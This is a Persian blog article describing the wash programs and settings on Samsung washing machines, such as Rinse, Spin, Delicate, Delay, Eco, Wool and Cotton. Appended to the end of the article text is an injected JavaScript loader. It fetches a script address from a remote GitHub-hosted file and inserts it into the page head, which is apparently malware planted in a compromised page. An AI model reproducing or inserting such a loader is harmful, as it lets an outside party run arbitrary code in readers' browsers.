دسته‌بندی نشده

برنامه ها و قابلیت های موجود روی ماشین لباسشویی های سامسونگ

سامسونگ برندی معتبر و جهانی از کشور کره جنوبی است که در زمینه های مختلفی از جمله لوازم خانگی و گوشی های هوشمند فعالیت دارد. فعالیت این برند در زمینه لوازم خانگی در سطح گسترده ای قرار دارد و وسایل مختلفی از جمله تلویزیون, یخچال فریزر, ماشین لباسشویی و ماشین ظرفشویی و وسایل ریز خانگی را عرضه کرده است. ماشین لباسشویی های سامسونگ از محبوبیت بالایی برخوردارند و به دلیل قابلیت های فوق العاده پیشرفته ای که در ان ها وجود دارد توانسته است طرفداران زیادی را به خود جذب کند. در این مقاله برنامه ها و تابع های مختلف موجود روی لباسشویی های سامسونگ و کاربرد و کارایی مختلف ان را را معرفی خواهیم کرد. 

بررسی کاربرد علامت های لباسشویی سامسونگ

Rinse ابکشی 

این گذینه برای انجام یک ابکشی اضافه برای لباس ها روی ماشین لباسشویی تعبیه شده است. ابکشی اضافه یا Rinse پس از اتمام چرخه شستشو برای اطمینان از تمیز شدن کامل لباس ها از مواد شوینده انجام می شود. تعداد مراحل ابکشی قابل تنظیم می باشد و همچنین زمان ان از بین 5 دقیقه تا 30 دقیقه قابل تغییر است. 

Spin 

در این ویژگی سرعت چرخش موتور تنظیم می شود. در این قابلیت کاربران می توانند مناسب با سرعت های تعبیه شده در لباسشویی خود سرعت مناسب برای شستشو لباس ها را تنظیم کنند.  

Delicate

شستشو لباس های نازک و ظریف در لباسشویی ها اغلب کاری ریسک پذیر است و امکان خراب و پاره شدن ان ها در بسیاری از لباسشویی ها امری دور از انتظار نمی باشد. در ماشین لباسشویی های سامسونگ با استفاده از چرخه مخصوص Delicate امکان شستشو این پارچه ها بدون نگرانی از تغییر حالت و فرم ان ها فراهم می شود. 

Delay شستشو با تاخیر

از محبوب ترین تابع های موجود در ماشین لباسشویی های سامسونگ شستشو با تاخیر است. در این برنامه افراد می توانند پس از قرار دادن لباس ها در لباسشویی زمان شروع ان را به دلخواه خود تنظیم کنند. در هر دستگاه برای این قابلیت ساعت های مختلفی تعبیه شده است و امکان تنظیم ان از 1 تا 24 ساعت برای برخی از محصولات سامسونگ فراهم است.

Rinse+Spin ابکشی و خشک کردن

قابلیت ابکشی و خشک کردن برای ابکشی کردن لباس ها پس از شستشو و همچنین خشک کردن ان ها مورد استفاده قرار می گیرد. از این قابلیت می توان برای لباس های عادی یا لباس هایی که با نرم کننده شستشو داده می شوند استفاده کرد. مدت زمان این برنامه از 5 تا 30 دقیقه متغییر است. 

pre wash پیش شستشو

از دیگر برنامه های محبوب و کاربردی موجود در لباسشویی های سامسسونگ برنامه پیش شستشو می باشد. از این برنامه قبل از شروع چرخه اصلی استفاده می شود و بیشتر برای نرم کردن لکه ها عمیق و خیساندن لباس ها جهت اماده شدن برای شستشو سخت با مواد شوینده استفاده می شود. 

Daily Wash شستشو روزانه

از این برنامه برای شستشو لباس های روزانه با میزان کثیفی متوسط استفاده می شود و کاربرد چندانی در شستن لباس های خیلی کثیف با لکه های عمیق ندارد. 

eco drum clean 

این قابلیت مناسب برای شستشو محفظه لباسشویی می باشد. این برنامه در برخی از مدل ها به صورت اتوماتیک کار می کند و در مدل های دیگر به صورت دستی فعال می شود. شستشو محفظه برای ایجاد محیطی بهداشتی در لباسشویی استفاده می شود و پس از چند دوره شستشو لباس ها با فعال کردن ان داخل درام از مواد شوینده و کثیفی های باقی مانده در ان کاملا تمیز خواهد شد. 

Wool پشمی 

برنامه شستشو Wool در لباسشویی سامسونگ برای شستشو پارچه های پشمی استفاده می شود. در این برنامه پارچه های پشمی با دما 40 درجه سانتی گراد و با استفاده از مواد شوینده مخصوص شستشو داده می شوند. در این برنامه مخصوص پارچه های پشمی مراقبت ویژه برای ان ها ایجاد می شود. 

Temp دما

با این دکمه می توان درجه حرارت های مختلف را برای شستشو لباس ها تنظیم و استفاده کرد. با این قابلیت می توانید از اب سرد و یا گرم برای شستن لباس ها و استفاده در چرخه شستشو استفاده کنید. 

Eco اقتصادی

از برنامه های اقتصادی و بسیار بصرفه لباسشویی های سامسونگ برنامه eco می باشد. در این برنامه مصرف انرژی دستگاه به صورت فوق العاده ای کاهش پیدا می کند و حالتی کاملا بصرفه با عملکردی صرفه جویانه می باشد. در این برنامه لباس ها در دما 20 درجه به مدت 90 دقیقه شستشو داده می شوند. مناسب ترین سرعت برای این چرخه 1200 دور در دقیقه می باشد. 

Synthentics پارچه های مصنوعی

از این برنامه برای پارچه های مصنوعی استفاده می شود. این برنامه برای پارچه های دیگر مانند پشمی و یا کتان کاربردی ندارد و امکان دارد به اینگونه پارچه ها اسیب برساند. در این چرخه لباس ها با دما 60 درجه و در مدت زمان 80 دقیقه شستشو داده می شوند. 

Baby Care

یک برنامه کاربردی و مناسب برای شستن لباس کودکان می باشد. در این برنامه لباس کودکان با مراقبت ویژه شستشو داده می شوند و تمامی لکه های روی ان از بین خواهد رفت. 

cotton کتان 

همانطور که از نام ان پبداست این برنامه مناسب برای شستشو پارچه های کتان می باشد. دما مورد استفاده در این برنامه 60 درجه سانتی گراد است و غیر از لباس های کتان برای شستشو لباس های رنگی و یا لباس زیر نیز استفاده می شود. 

Dry Level خشک کن

این گذینه برای خشک کردن لباس ها و تنظیمات مربوط به ان استفاده می شود. با این قابلیت نحو خشک کردن لباس ها پس از اتمام شستشو ان ها کنترل خواهد شد. 

برنامه های mix, dark wash و whites نیز برای لباس های ترکیبی, شستشو لباس های سفید و همچنین لباس های تیره و یا مشکی مورد استفاده قرار می گیرند.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *